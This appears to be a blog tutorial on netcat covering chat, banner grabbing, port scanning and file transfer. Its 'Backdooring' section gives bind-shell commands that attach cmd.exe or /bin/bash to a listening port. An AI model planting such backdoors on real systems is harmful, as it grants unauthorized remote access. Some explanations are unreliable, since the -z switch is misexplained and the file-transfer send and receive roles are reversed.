The Mighty Netcat

I am sure that if you are a person who has some interest in playing around with networks you must have heard about utility called Netcat.

Netcat is simple tool that reads and writes data across TCP or UDP network connections , It was released back in 1995 and has remained popular till today. Despite being popular it is not maintained but a different tool ncat has brought several serious improvements to it but here we’ll just stick to good old netcat.

What can it be used for ?

Messaging - using Netcat, an operator can redirect simple text between
two computers in a simplistic chat.

File Transfer - Netcat allows you to transfer files between computers.

Banner Grabbing - Netcat allows an operator to establish a socket to a specific
port to potentially identify the operating system, service, version, and other information necessary to audit the host.

Port Scanning - Netcat allows the operator to utilize a rudimentary port scanning
function, whereby a port or series of ports can be scanned to determine if the
port is open or closed

Most unix based operating system come pre-installed with this utility,However you can also download and compile it youself (http://netcat.sourceforge.net/) . You can use this on windows too.
Note that I have used netcat-traditional in this post while Ubuntu is shipped with netcat-openbsd , checkout this stackoverflow question on how to change it

Sending Message

I will be using a virtual machine to demonstrate this which has BlachArch Linux on it configured on Bridged Networking

Launch a terminal or command promt(windows) , In this case listener operating system is Blackarch
Type in the following command:

1
nc -vlp 8080

This command opens listener on port 8080
now to connect you need to have ip address of listener in my case it’s 192.168.1.4
type the following command to connect to listener

1
nc 192.168.1.4 8080

when it’s connected try to send message from either of connected machines , it might look something like
message

We can use netcat to grab information about running services on specific ports on a host , to grab banner fire up terminal and issue this command , in this case to grab banner of a web-server.

1
nc 192.168.1.2 80
1
GET / HTTP/1.0

To send HTTP GET request

1
2
3
[enter]
[enter]

you might get something like

HTTP/1.0 200 OK
Date: Mon, 02 Feb 2015 07:29:47 GMT
Server: Apache/2.2.14 (Ubuntu)
Content-Length: 312
Connection: close
Content-Type: text/html; charset=iso-8859-1

to grab banner of other port/services use

1
nc -v -n <ip> <port>

I used this command to grab banner of my local ssh server and it gave output as

[email protected]:~$ nc -v -n 127.0.0.1 22
(UNKNOWN) [127.0.0.1] 22 (ssh) open
SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu3.1.IS.10.04

Backdooring

Interestingly netcat can also be used for backdooring , there are many reverse shell script that can be used to bind on port so that an attacker can connect it later but here we’ll use netcat for both listening and connecting

if target is window you can use

1
nc -vlp 8080 -e cmd.exe

it will execute cmd.exe when it’s connected by other machine

and if it’s unix/unix-like you can use

1
nc -vlp 8080 -e /bin/bash

to connect simply use netcat to connect on port 8080 as in this case
use

1
nc <ip> 8080

and then after that we can simple execute system commands in netcat

backdoor

PortScanning

When most people talk of port scanners and port scanning capabilities, they generally don’t think of Netcat in the same vein as tools like Nmap, Angry IP Scanner, or Foundstone’s SuperScan. However, Netcat can perform basic port scanning capabilities and even offers the
ability to obfuscate the source of the port scan.

to port scan type this command in terminal

1
nc -v -w 1 <host> -z <ip range>

for example I perfomed this scan on my router and it gave out

nc -v -w 1 192.168.1.1 -z 1-100
ZXDSL [192.168.1.1] 80 (http) open
ZXDSL [192.168.1.1] 23 (telnet) open
ZXDSL [192.168.1.1] 22 (ssh) open
ZXDSL [192.168.1.1] 21 (ftp) open

The -v is for verbosity, which in our port scan indicates the open ports that the port scan uncovers. The -w parameter instructs Netcat to wait for one second between scan attempts, or in other words, indicates how long it needs to wait for a port to respond as being open or closed. Next is the target we want to scan, which in this example is 192.168.1.1 , -z switch is new, and indicates that Netcat should operate in zero I/O mode. Zero I/O mode, in this case, speeds up the process of executing the port scan by ignoring any latency baked in by the program to account for delays by the CPU. Finally, we specify range which in this case is 1-100

Sending Files

netcat can be used to send files between server and client without hassle of setting up ftp server and simply using few lines of command

Start the listener server by following command , make sure file which is database.file here is in directory from where command was executed

1
nc -v -w 30 -p <port> > database.file

and on the client side to receive file :

1
nc -v -w 2 <ip> <port> < database.file